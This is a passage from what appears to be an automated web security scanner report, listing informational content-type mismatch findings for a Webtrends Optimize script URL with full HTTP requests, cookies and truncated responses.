6c6ac5a930e190d0cebbbbb4cb781b92e7e8616e64828704e7f7e5973892be0b10d915ad171058d25c9c252bc80805dce5ae07bee1b7fdfa4e16eb16199ee5c035d0b72f0535a40285bc02469b5ca589600aa302ac307f41f4c127f25807c2171abcda262a66997fdbd8648e706525d12b903d85f86bb00bfb0301ab023897426a18e2030341b5efbcbdc17f00e29490995e7e645e8c071c45763bff07d4cbd08c55b970aa2d69a2cdf4fbfa782a03e52f35203c604c02aa3d9fcef7967a72f1ffce2ea1d5f833c7824d52dbfac17e6d7c68a56a0291505b6dcce38f9c3bf8201c2cd44c61012f9eda3262e104529eefb332c9d5d53a2224c7cf8174f37fc9c077c78741c63ed45f76392a107872e324ab126432f4bedad5544cdac00973163999da663410d559c34d37d16c8825a24c79255bb9f5a9c3d3add2b39f9e11cdf9b08d4c20101b4a58f69693c139eac5cdb238495e8c369a1cf1c7a4211cd721814f21f6a798bfaceeacb01dce7b881fe4b34f9df974d2fa95bd1155b2cf138d981c4ce5f48a9f05e54ae283da7169509a69c7c0532e3ed3581b3d9f55aa3be902628708d95f59ddeb0b605aa711fc0e0c26d3c6a36749acd52b687c2858f2dd38372d724b42ba7699a42b300cd6ff37e859dc8977f5383a32900a155101c10def4af4e74f56bd89a6245fcc853d10ee0c09c2027d0f5af97bd51b7ce9b0b278631a5cadc8aa32b4fbc749ea6d0e2965d93432cc0ab1d68d7bc5c72fd11ede18cbbe0c07f4e0313b666e7c50092ede0601d16080ecf6c303cee3d9a3bc0f723c65d31c8e52458d23f7b439bb80af0e822edfe3ab3de1b40d5c39329eba1ba206e4ed966cc78f309399465fcc747f0d7b19e83bf55f153f6dc5fbb120019a0c2

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d8250549d27fbe246b0270842ff9234ba8453226ac048925d62ae9ed1fc1bc215ad8c6bc117d7d7756872fb4785da9d30c46a0f86a17e684c65d73f9f46d4fc455f86a500cdc524c11f6833f2ee822f7e6d440f801681da9b1aa65d0ef464b4d43b582fa26e6d0e961744e2800c7c16ac21ab374598da85e052c149dbfeca05a8a805b308205e225f7a9766c3f667b8ba4180f674fa34a5dd9b97d9b10b9560d06ad9ab0e98038df8e4ae7e3b529ec7800e48729be3c7d0fc6f47c26b34cfbdca595b0840800073de1a35a49378b0d2607595a130bbb2a50d84d5ca23a2c907ee0b1423a5c8467254ea2dcfe255575072f2306a5986c6ac5a930e190d0cebbbbb4cb781b92e7e8616e64828704e7f7e5973892be0b10d915ad171058d25c9c252bc80805dce5ae07bee1b7fdfa4e16eb16199ee5c035d0b72f0535a40285bc02469b5ca589600aa302ac307f41f4c127f25807c2171abcda262a66997fdbd8648e706525d12b903d85f86bb00bfb0301ab023897426a18e2030341b5efbcbdc17f00e29490995e7e645e8c071c45763bff07d4cbd08c55b970aa2d69a2cdf4fbfa782a03e52f35203c604c02aa3d9fcef7967a72f1ffce2ea1d5f833c7824d52dbfac17e6d7c68a56a0291505b6dcce38f9c3bf8201c2cd44c61012f9eda3262e104529eefb332c9d5d53a2224c7cf8174f37fc9c077c78741c63ed45f76392a107872e324ab126432f4bedad5544cdac00973163999da663410d559c34d37d16c8825a24c79255bb9f5a9c3d3add2b39f9e11cdf9b08d4c20101b4a58f69693c139eac5cdb238495e8c369a1cf1c7a4211cd721814f21f6a798bfaceeacb01dce7b881fe4b34f9df974d2fa95bd1155b2cf138d981c4ce5f48a9f05e54ae283da7169509a69c7c0532e3ed3581b3d9f55aa3be902628708d95f59ddeb0b605aa711fc0e0c26d3c6a36749acd52b687c2858f2dd38372d724b42ba7699a42b300cd6ff37e859dc8977f5383a32900a155101c10def4af4e74f56bd89a6245fcc853d10ee0c09c2027d0f5af97bd51b7ce9b0b278631a5cadc8aa32b4fbc749ea6d0e2965d93432cc0ab1d68d7bc5c72fd11ede18cbbe0c07f4e0313b666e7c50092ede0601d16080ecf6c303cee3d9a3bc0f723c65d31c8e52458d23f7b439bb80af0e822edfe3ab3de1b40d5c39329eba1ba206e4ed966cc78f309399465fcc747f0d7b19e83bf55f153f6dc5fbb120019a0c2 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=46EC8A693A8B058A0B9D418F6DDAF0B4; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93201eda062; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; Expires=Sun, 01-Jan-2012 00:02:13 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=024cc5f8; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e9320537bb59; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.71. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e9320333bd69; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:52 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=9EE5E42568221972B90415F936FA1D9A; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; Expires=Sun, 01-Jan-2012 00:29:52 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=03c4ccee; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200db2e76; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.72. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33c